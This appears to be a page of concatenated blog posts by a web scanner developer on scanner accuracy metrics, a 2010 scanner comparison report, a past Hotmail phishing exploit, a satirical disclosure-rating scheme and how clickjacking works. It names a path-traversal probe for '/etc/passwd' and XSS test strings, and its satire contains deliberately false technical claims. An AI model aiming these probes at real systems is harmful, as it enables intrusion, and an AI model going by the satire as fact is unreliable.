Over the next month I will be moving posts from [the old site] to this site, which is why you might notice “new” posts appearing with dates from the past.
This is the first in a series of essays describing suggested metrics for evaluating web application security scanners.
Accuracy measures the scanner’s ability to detect vulnerabilities. The basic function of a web scanner is to use automation to identify the same, or most of the same, vulnerabilities as a web security auditor. Rather than focus on the intricate details of specific vulnerabilities, this essay describes two major areas of evaluation for a scanner: its precision and faults.
- Encoding and obfuscation (e.g. employing various character sets or encoding techniques to bypass possible filters)
- Applicability to different technologies in a web platform (e.g. PHP superglobals, .NET VIEWSTATE)
- Signatures such as HTTP response code, string patterns, and reflected content (e.g. matching ODBC errors or looking for alert(1) strings)
- Inference based on interpreting the results of a group of requests (e.g. “blind” SQL injection that affects the content of a response based on specific SQL query constructions)
- Time-based tests measure the responsiveness of the web site to various payloads. Not only can they extend inference-based tests, but they can also indicate potential areas of Denial of Service if a payload can cause the site to spend more resources processing a request than an attacker requires making the request (e.g. a query that performs a complete table scan of a database).
- URI parameters
- POST data
- Client-site headers, especially the ones more commonly interpreted by web sites including User-Agent, the-forever-misspelled Referer, and Cookie.
- Misdiagnosis of generic error page or landing page
- Poor test implementation that misinterprets correlated events to infer cause from effect (e.g. changing a profile page’s parameter value from Mike to Mary to view another user’s public information is not a case of account impersonation – the web site intentionally displays the content)
- Sole reliance on inadequate test signature to claim the vulnerability exists (e.g. a poor regex or stating an HTTP 200 response code for ../../../../etc/passwd indicates the password file is accessible)
- Web application goes into error state due to load (e.g. database error occurs because the server has become overloaded by scan traffic, not because a double quote character was injected into a parameter)
- Lack of security impact (e.g. an unauthenticated, anonymous search form is vulnerable to CSRF – search engines like Google, Yahoo!, and Bing are technically vulnerable but the security relevance is questionable)
- Lack of test. The scanner simply does not try to identify the particular type of vulnerability.
- Inadequate signatures (e.g. the scanner does not recognize SQL errors generated by Oracle)
- Insufficient replay of requests (e.g. a form submission requires a valid e-mail address in one field in order to exploit an XSS vulnerability in another field)
- Inability to automate (e.g. the vulnerability is related to a process that requires understanding of a sequence of steps, knowledge of the site’s business logic). The topic of vulnerabilities for which scanners cannot test (or have great difficulty testing) will be addressed separately.
- Lack of authentication state (e.g. the scanner is able to authenticate at the beginning of the scan, but unknowingly loses its state, perhaps by hitting a logout link, and does not attempt to restore authentication)
- Link not discovered by the scanner. This falls under the broader scope of site coverage, which will be addressed separately.
Note: I’m the lead developer for the Web Application Scanning service at Qualys and I worked at NTO for about three years from July 2003 — both tools were included in this February 2010 report by Larry Suto. Never the less, I most humbly assure you that I am the world’s foremost authority on my opinion, however biased it may be.
The February 2010 report, Analyzing the Accuracy and Time Costs of Web
Application Security Scanners, once again generated heated discussion about web application security scanners. (A similar report was previously published in October 2007.) The new report addressed some criticisms of the 2007 version and included more scanners and more transparent targets. The 2010 version, along with some strong reactions to it, engender some additional questions on the topic of scanners in general:
How much should the ability of the user affect the accuracy of a scan?
Set aside basic requirements to know what a link is or whether a site requires credentials to be scanned in a useful manner. Should a scan result be significantly more accurate or comprehensive for a user who has several years of web security experience than for someone who just picked up a book in order to have spare paper for origami practice?
I’ll quickly concede the importance of in-depth manual security testing of web applications as well as the fact that it cannot be replaced by automated scanning. (That is, in-depth manual testing can’t be replaced; unsophisticated tests or inexperienced testers are another matter.) Tools that aid the manual process have an important place, but how much disparity should there really be between “out of the box” and “well-tuned” scans? The difference should be as little as possible, with clear exceptions for complicated sequences, hidden links, or complex authentication schemes. Tools that require too much time to configure, maintain, and interpret don’t scale well for efforts that require scanning to more than a handful of sites at a time. Tools whose accuracy correlates to the user’s web security knowledge scale at the rate of finding smart users, not at the rate of deploying software.
What’s a representative web application?
A default installation of osCommerce or Amazon? An old version of phpBB or the WoW forums? Web sites have wildly different coding styles, design patterns, underlying technologies, and levels of sophistication. A scanner that works well against a few dozen links might grind to a halt against a few thousand.
Accuracy against a few dozen hand-crafted links doesn’t necessarily scale against more complicated sites. Then there are web sites — in production and earning money no less — with bizarre and inefficient designs such as 60KB .NET VIEWSTATE fields or forms with seven dozen fields. A good test should include observations on a scanner’s performance at both ends of the spectrum.
Isn’t gaming a vendor-created web site redundant?
A post on the Accunetix blog accuses NTO of gaming the Accunetix test site based on a Referer field from web server log entries. First, there’s no indication that the particular scan cited was the one used in the comparison; the accusation has very flimsy support. Second, vendor-developed test sites are designed for the very purpose of showing off the web scanner. It’s a fair assumption that Accunetix created their test sites to highlight their scanner in the most positive manner possible, just as HP, IBM, Cenzic, and other web scanners would (or should) do for their own products. There’s nothing wrong with ensuring a scanner — the vendor’s or any other’s — performs most effectively against a web site offered for no other purpose than to show off the scanner’s capabilities.
This point really highlights one of the drawbacks of using vendor-oriented sites for comparison. Your web site probably doesn’t have the contrived HTML, forms, and vulnerabilities of a vendor-created intentionally-vulnerable site. Nor is it necessarily helpful that a scanner proves it can find vulnerabilities in a well-controlled scenario. Vendor sites help demonstrate the scanner, they provide a point of reference for discussing capabilities with potential customers, and they support marketing efforts. You probably care how the scanner fares against your site, not the vendor’s.
What about the time cost of scaling scans?
The report included a metric that attempted to demonstrate the investment of resources necessary to train a scanner. This is useful for users who need tools to aid in manual security testing or users who have only a few web sites to evaluate.
Yet what about environments where there are dozens, hundreds, or — yes, it’s possible — thousands of web sites to secure within an organization? The very requirement of training a scanner to deal with authentication or crawling works against running scans at a large scale. This is why point-and-shoot comparison should be a valid metric. (In opposition to at least one other opinion.)
Scaling scans don’t just require time to train a tool. It also requires hardware resources to manage configurations, run scans, and centralize reporting. This is a point where Software as a Service begins to seriously outpace other solutions.
Where’s the analysis of normalized data?
I mentioned previously that point-and-shoot should be one component of scanner comparison, but it shouldn’t be the only point — especially for tools intended to provide some degree of customization, whether it simply be authenticating to the web application or something more complex.
Data should be normalized not only within vulnerabilities (e.g. comparing reflected and persistent XSS separately, comparing error-based SQL injection separately from inference-based detections), but also within the type of scan. Results without authentication shouldn’t be compared to results with authentication. Other steps would be to compare the false positive/negative rates for tests scanners actual perform rather than checks a tool doesn’t perform. It’s important to note where a tools does or does not perform a check versus other scanners, but not performing a check has a different reflection on accuracy versus performing a check that still doesn’t identify a vulnerability.
What’s really going on here?
Designing a web application scanner is easy, implementing one is hard. Web security has complex problems, many of which have different levels of importance, relevance, and even nomenclature. The OWASP Top 10 project continues to refine its list by bringing more coherence to the difference between attacks, countermeasures, and vulnerabilities. The WASC-TC aims for a more comprehensive list defined by attacks and weaknesses. Contrasting the two approaches highlights different methodologies for testing web sites and evaluating their security.
So, if performing a comprehensive security review of a web site is already hard, then it’s likely to have a transitive effect on comparing scanners. Comparisons are useful and provide a service to potential customers, who want to find the best scanner for their environment, and useful to vendors, who want to create the best scanner for any environment. The report demonstrates areas not only where scanners need to improve, but where evaluation methodologies need to improve. Over time both of these aspects should evolve in a positive direction.
The book starts off with a discussion of cross-site scripting (XSS) attacks along with examples from 2009 that illustrate the simplicity of these attacks and the significant impact they can have. What’s astonishing is how little many of the attacks have changed. Consider the following example, over a decade old, of HTML injection before terms like XSS became so ubiquitous. The exploit appeared about two years before the blanket CERT advisory that called attention to insecurity of unchecked HTML.
The discoverers, in apparent ignorance of the 1990’s labeling requirements for hacks to include foul language or numeric characters, simply dubbed it the “Hot”Mail Exploit. (They demonstrated further lack of familiarity with disclosure methodologies by omitting greetz, lacking typos and failing to remind the reader of near-omnipotent skills — surely an anomaly at the time. The hacker did not fail on all aspects. He satisfied the Axiom of Hacking Culture by choosing a name, Blue Adept, that referenced pop culture, in this case the title of a fantasy novel by Piers Anthony.)
The attack required two steps. First, they set up a page on Geocities (a hosting service for web pages distinguished by being free before free was co-opted by the Web 2.0 fad) that spoofed Hotmail’s login.
The attack wasn’t particularly sophisticated, but it didn’t need to be. The login form collected the victim’s login name and password then mailed them, along with the victim’s IP address, to the newly-created Geocities account.
The second step involved executing the actual exploit against Hotmail by sending an e-mail with HTML that contained a rather curious img tag:
An opinion piece covering all you ever wanted to know. Maybe not everything, but it provides a basis for the different challenges of automating web attacks. It might even sound familiar to a previous post…
Read a Q&A on some of the fundamental challenges of automating a web application scan. (I wrote the A, not the Q.)
…seven of the most common vulnerabilities that plague web applications.
Vulnerability disclosure presents a complex challenge to the information security community. A reductionist explanation of disclosure arguments need only present two claims. One end of the spectrum goes, “Only the vendor need know so no one else knows the problem exists, which means no one can exploit it.” The information-wants-to-be-free diametric opposition simply states, “Tell everyone as soon as the vulnerability is discovered”.
The Factor of Ultimate Doom (FUD) is a step towards reconciling this spectrum into a laser-focused compromise of agreement. It establishes a metric for evaluating the absolute danger inherent to a vulnerability, thus providing the discoverer with guidance on how to reveal the vulnerability.
The Factor is calculated by simple addition across three axes: Resources Expected, Protocol Affected, and Overall Impact. Vulnerabilities that do not meet any of the Factor’s criteria may be classified under the Statistically Irrelevant Concern metric, which will be explored at a later date.
(2) Exploit shellcode requires fewer than 12 bytes. In other words, it must be more efficient than the export PS1=# hack (to which many operating systems, including OS X, remain vulnerable)
(1) Exploit shellcode requires a GROSS sled. (A GROSS sled uses opcode 144 on Intel x86 processors, whereas the more well-known NOP sled uses opcode 0x90.)
(3) The Common Porn Interchange Protocol (TCP/IP)
(2) Multiple online rhetorical opinion networks
(1) Social networks
(3) Control every computer on the planet
(2) Destroy every computer on the planet
(1) Destroy another planet (obviously, the Earth’s internet would not be affected — making this a minor concern)
The resulting value is measured against an Audience Rating to determine how the vulnerability should be disclosed. This provides a methodology for verifying that a vulnerability was responsibly disclosed.
Audience Rating (by Factor of Ultimate Doom*)
(> 6) Can only be revealed at a security conference
(< 6) Cannot be revealed at a security conference
(< 0) Doesn’t have to be revealed; it’s just that dangerous
(*Due to undisclosed software patent litigation, values equal to 6 are ignored.)
So, I was asked to comment about clickjacking today. Technically, it isn’t a new vulnerability (IE6 fixed a variant in 2004, Firefox fixed a variant in September 2008), but a refinement of previous exploits and ennobled with a catchier name. It gained widespread coverage in October 2008 prior to the OWASP NYC conference when Jeremiah Grossman and Robert Hansen first said they would describe the vulnerability, then cancelled their talk for fear of unleashing Yet Another Exploit of Ultimate Doom.* The updated technique combines devious DOM manipulation with well-established attack patterns to make a respectable type of attack.
Clickjacking tricks a user into clicking on an attacker-supplied page while the user only sees the appearance and effect of clicking on a plain link. The attacker identifies an area in the target HTML that should receive the click event. This HTML is placed within an IFRAME such that the X and Y offsets of the frame place the target area in the upper left-hand corner of the frame’s visible area. This target IFRAME is visually hidden from the user (though the element remains part of the DOM). Then, the IFRAME is set within a second page (the content of which doesn’t matter) beneath the mouse cursor and, very importantly, dynamically moves to always be underneath the mouse. Then, when the user clicks somewhere within the second page the click is actually sent to the target area even though it appears to the user that the mouse is only above some innocuous link.Essentially, an attacker chooses some web page that, if the victim clicked some point (link, button, etc.) on that page, would produce some benefit to the attacker (e.g. generate click-fraud revenue, change a security setting, etc.). Next, the attacker takes the target page and places a second, innocuous page over it. The trick is to get the victim to make a mouse click on what appeared to be the innocuous page, but was actually an invisible element of the target page that has been automatically, but invisbly, placed beneath the cursor.The attack relies on luring a user to a server under the attacker’s control or a site that has been compromised by the attacker. Web site owners who ensure their site is free of cross-site scripting or other vulnerabilities can prevent their sites from being used as a relay point for the attacker. Yet other successful attacks, such as phishing, also rely on luring users to a server under the attacker’s control. The relative success of phishing implies that just securing web applications at the server isn’t the only solution because users can be tricked into visiting malicious web sites.The core of the attack occurs in the browser, which is where the real fix needs to appear. The problem is that browsers are intended to handle HTML from many sources and provide mechanisms to manipulate the location and visibility of elements within a web page. Consequently, any solution would have to block this attack while not inhibiting legitimate uses of this functionality.
In 1998, L0pht claimed before Congress that in under 30 minutes their seven member group could make online porn and Trek fan sites unusable for several days. (That’s all that existed on the Internet in 1998.) In February 2002 an SNMP vulnerability threatened the very fabric of space and time (at least as it related to porn and Trek fan sites — if you still don’t believe me, consider that Google added Klingon language support the same month). More recently, a DNS vulnerability was (somewhat re-)discovered that could enable attackers to redirect traffic going to sites like google.com and wikipedia.com to sites that served porn, even though many people wouldn’t notice the difference. (Dan Kaminsky compiled a list of other apocalyptic vulnerabilities similar to the issues that plagued DNS.)
This year at the OWASP NYC AppSec 2008 Conference Jeremiah Grossman and Robert “RSnake” Hansen shared another vulnerability, clickjacking, in the Voldemort “He Who Must Not Be Named” style. In other words, yet another eschatonic vulnerability existed, but its details could not be shared. This disclosure method continued the trend from Black Hat 2008 prior to which the media and security discussion lists talked about the secretly-held, unsecretly-guessed DNS vulnerability information with the speculation usually retained for important things like when Gn’Fn’R would finally release Chinese Democracy. [If you don’t care about gory details of the disclosure drama and just want to skim the abattoir, then read this summary.]